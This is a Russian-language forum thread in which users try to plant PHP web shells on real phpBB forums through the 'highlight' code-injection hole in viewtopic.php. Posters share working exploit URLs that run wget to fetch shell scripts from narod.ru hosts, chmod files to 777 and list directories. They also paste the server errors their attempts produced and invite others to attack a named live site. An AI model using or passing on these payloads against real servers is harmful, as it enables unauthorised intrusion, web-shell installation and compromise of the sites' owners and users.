Не получается залить шелл. Я понимаю, что это звучит оооооочень глупо, но я уже не знаю, что делать… я уже все перепробовал… дело в том, что первый раз у меня получилось залить, но получилось не до конца… т.е. только половину файла ). На второй день уже нечего не получается залить… (. У меня настроение упало в несколько раз… сейчас сижу, голову ломаю, и думаю, где я мог проламерится…(… ну вроде все ж правильно…( Просмотр директории, добавлять полные права, у меня выходит, а вот инклуд, или заливка, полный пи$%ец… viewtopic.php?xxx=wget%20http://zattack.narod.ru/rem.php&t=10&highlight=%2527.include($_GET[xxx]).include.%2527 Ну ЧТО ТУТ НЕПРАВИЛЬНО??? Вить viewtopic.php?xxx=echo%20huitext&t=10&highlight=%2527.include($_GET[xxx]).include.%2527 срабатывает… ПЛЗ, очень прошу помогите разобраться в этой х%$@e...(
попробуй так. http://[Target]/viewtopic.php?p=44&highlight=%2527.$poster=pwd;ls%20-l;wget%20http://docentattack.narod.ru/p.php
Это вопрос риторический. Для того что-бы немного разбиратя в этом всем. Я прочитал книги: Html; css; Linux; PHP5; Javascript. Почитай =)
------------------------------------------ PHP: Parse error: parse error, unexpected ';' in /var/www/virtual/ua/com/kievnet/forum/htdocs/viewtopic.php(1109) : regexp code on line 1 Fatal error: preg_replace() [function.preg-replace]: Failed evaluating code: preg_replace('#\b('\.$poster\=pwd;ls|-l;wget|http\://zattack\.narod\.ru/zz\.php)\b#i', '<span style="color:#FFA34F"><b>\1</b></span>', '><') in /var/www/virtual/ua/com/kievnet/forum/htdocs/viewtopic.php on line 1109 Неее... фанарь... не работает (((
Парень, ты наверное немного ошибся: правильно будет так: а ты пытаешься выпонить системную команду, когда сам пишешь include($_GET[xxx]) расскажи как ты добавляешь полные права... .htaccess правишь что-ли?
Мля... все равно бага не пашет ( viewtopic.php?t=1&highlight=%2527.die(%60cd%09../;chmod%09777%09_FILE.php_;pwd;ls%09-l%60).%2527
Вот вчера ночью заметил еще один вариант… Решил попробовать… для начала ввел Вылезло место нахождения форума… /var/www/virtual/ua/com/kievnet/forum/htdocs Все, я такой радый, прям как слон, уверен в победе, ввожу . Т.е. чтоб передо мной высветился списочек файлов и их прав… Место этого появилось )\b#i . Ну этт вообще нормально???
И че эт надо читать и понимать??? нелегка хакерская доля... Сделали бы школу хацкеров-стопудово народу было бы.... и я б записался... эх,мож кто научит,а мож и сам научусь
1Народ...мля..я конечно понимаю..но это уже оффтопик... 2Что, некто нечего подсказать не может???? Ну и где же знаменитые модераторы, админы? )
я в этом не разбираюсь,вот,зайди завтра мож ответят;а вообще надо типа чата что-нить сделать-я уже предлагал,но...
А толку даже если бы чат был? А школы не будет =) Потому что тогда и хакеров не будет. Вот так же раньше было. Были все неучи, типа, и один чел, его звали Эйнштейн был учёным... Он там всякие вещи наизобретал и народ подумал, а что если школу открыть, может все Эйнштейнами станем. Школу открыли а толку нету. Так же и с хакерской школой будет. Хакерами не становяться - хакерами рождаются!!!!!!!!!!!!!
Вот у меня возник еще один вопрос… эти команды именно для Linux? А если на сервере стоит например FreeBSD? Команды будут те же???
Команды практически одинаковы на Linux и FreeBSD процентов на 90. Разница в установленом програмном обеспечении. В стандартной установке FreeBSD нет никаких левых прог. В линуксе в любом дистрибутиве прог довольно много. Это вкрадце.
Егорыч+++, будут какие-то идеи или намеки, по поводу #10 вопроса? Жалко вить… Тут мне подсказывали, найди другой форум… А интерес? Я не понимаю… ломать под известные уязвимости все что попадется под руку? Лично я, не вижу не интереса, не смысла. Я задаю перед собой цель, конечную цель… Не имеет значение сколько на это уйдет время, сколько я буду долбиться об клавиатуру головой, я ее все равно выполню, до конца…
-SX- как ты загнул шелл?У меня нах не получается,все команды тоже пишет: Warning: shell_exec() has been disabled for security reasons in /disk2/clients/a1673/mytischi.com/htdocs/phpbb/viewtopic.php(1104) : regexp code on line 1 Будешь любезен,можешь попробовать сам здесь http://www.mytischi.com/phpbb Если получится дай команду,которой запускал